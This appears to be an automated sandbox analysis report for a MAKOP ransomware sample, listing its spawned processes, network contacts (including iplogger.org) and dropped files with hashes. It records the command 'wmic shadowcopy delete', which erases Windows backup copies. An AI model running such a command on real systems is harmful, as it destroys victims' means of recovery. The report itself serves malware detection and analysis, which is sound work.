C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 95.100.245.168:80 | x2.c.lencr.org | tcp |
Files
\Users\Admin\AppData\Local\Temp\nso8B5F.tmp\System.dll
| MD5 | fccff8cb7a1067e23fd2e2b63971a8e1 |
| SHA1 | 30e2a9e137c1223a78a0f7b0bf96a1c361976d91 |
| SHA256 | 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e |
| SHA512 | f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c |
memory/2812-7-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2812-10-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2812-9-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2812-16-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2812-26-0x0000000000400000-0x000000000041F000-memory.dmp
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\readme-warning.txt
| MD5 | d171c561e20fc9714f85da3c4331d0b6 |
| SHA1 | 8f7e6cd4bda627a0a3d1a0e687c8b998db3b9438 |
| SHA256 | 3c829147b1f82f255e4032d2a22d5b83932bc7f74f3540137146530be0353aac |
| SHA512 | b52823ac0dba9dec6a243d1a3d68718c2a825dae4d6f4f312e92d87ecb87dbb066f259b317628fa588ad1abc4a59e095e5e302e53294bd8b34d414fadc8420c2 |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | 40b7f298d30296864906d4e175ff9f43 |
| SHA1 | 349b60915d0ce78aacc57231ae1e0df151e20087 |
| SHA256 | 2448a49c12e2c959a2f88d179c346a4d753725578a4755c8f8f487b1048fdcd4 |
| SHA512 | ed4c76fa8e4e0eb527f34ea6a25094ee8bdc343be1c0806bcb8baff3cd77e6944cee50125090a7fd8869951b53ced7dce4a48a197859a1e4616c7495390b36e7 |
memory/2812-2181-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2524-6141-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2524-6796-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2524-6795-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | ba41580a52e592f902ce53d5bf4eaddc |
| SHA1 | 463acff5a71dd7c580b7ae52091dc5ec3075fb0a |
| SHA256 | 50577e8ae3331aa6d25cfb4a270291ee3503d88febca708d9de04b796ee694df |
| SHA512 | 4697440accd08c20b9807471d6443f827f001ef4bbb733f2323d29cb4613bfc944f0798d5b3a2502931826898a3ff0255f0e62118445118e296bdb2e92b77086 |
C:\Users\Admin\AppData\Local\Temp\Cab8317.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar83F4.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2b90448ce29f4e674788aeb7ad767303 |
| SHA1 | 9b8f30a99850feb5d15a34adf623460628cc8468 |
| SHA256 | 38ac14ad85a09c9f1390823699b30156c4f3b5220566afd2ba971270cb2d5c3d |
| SHA512 | 0187c6d45549d7cda4b76634a3e49bb1093d52aa6db97ad57c69049de908927f2af6afbc7dd492dd4f8f85a20dce62b4c90ce06ed342e1ebdba62155cfe76945 |
memory/2812-18827-0x0000000000400000-0x000000000041F000-memory.dmp
memory/1260-18905-0x0000000000400000-0x000000000041F000-memory.dmp
memory/1260-18907-0x0000000000400000-0x000000000041F000-memory.dmp
memory/1260-18906-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | df63728d68a4ac8b176671b22e5b3b76 |
| SHA1 | 839728f505861e48749e9ee81210cca4125d3537 |
| SHA256 | bd1aa34af510bdbe455df7e883e3ab3d2a220a703fffe872e13d2167519f311e |
| SHA512 | 6e6878f30d7dfa2aae6eb6a874852df9c440c9a3257d4dba97176706c4b68cfceec1dc3eabf8d02329b2fbca7a4f7995ebd944f1926e19b689bf5d3ff850fb50 |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | 8e7e18c8210e7d646ba907dc2cfa4a6b |
| SHA1 | 4255763de5f28bf6fd0d8fedecdcfd2404640c2d |
| SHA256 | 8ffe6a6cebda792b30d97a1a63c83022eb68e40cbe707e6d17dd02dce7af63a1 |
| SHA512 | a8f977c603ea40b17afbad99f734e3bf3a0b51d0c2e4680508d3b23c555794c8b7031a4c8df39b65ba9f29ee84f154c37475b0b30bc70bc897871d15043ec996 |
\??\PIPE\wkssvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | 4a3b09bfb912f280a4aa4b8dc4b58862 |
| SHA1 | bd37c1b38e009f035e16ca6f4c73d730508f8e5e |
| SHA256 | f640cf30c960268b2b2e27ee202a5d7474b5da127b3c9374724166858c24a8a7 |
| SHA512 | 76ad7cf9f6f14d7d51e22b231e60fd6f42f3683ec921d19ff886e8e54ba7518ebdc88942b0d546200983949c56d8dc9067833f84803737e66d56891a4e2efeb2 |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | 9b0399133aed66f49a14ff6a227f88d4 |
| SHA1 | ab030c6437390e573b9dc2e7a60a8db193264422 |
| SHA256 | 8dae63d671d34974468b6d9f39b75ad69fc20fb513606f93f82ddcd4b61a3f3c |
| SHA512 | 176f1d0358fe911bb1a23e33e66cd5021453a91f5a33b399930c2338ba46e3719326aefbdaab4ba198408c6a4aa889d4b6809d115b37309fc4271b922666a546 |
C:\Users\Admin\AppData\Roaming\779389082
| MD5 | c5da74a39363bc6170af60df8b32c49f |
| SHA1 | 2c129125a373564ce77d4ac4475c8a887566ae8c |
| SHA256 | 544e5401fc63101ff7383fb4b696ab1d5b4a55071c7ea463237633c574621384 |
| SHA512 | 76e26c133adc776df9063c0c852fd3b57d98aa97f764dff880440594ba1d32318e3ebe3989b927eb78b0564674d86f313836ae1e47c459a9a881d26789760bb7 |
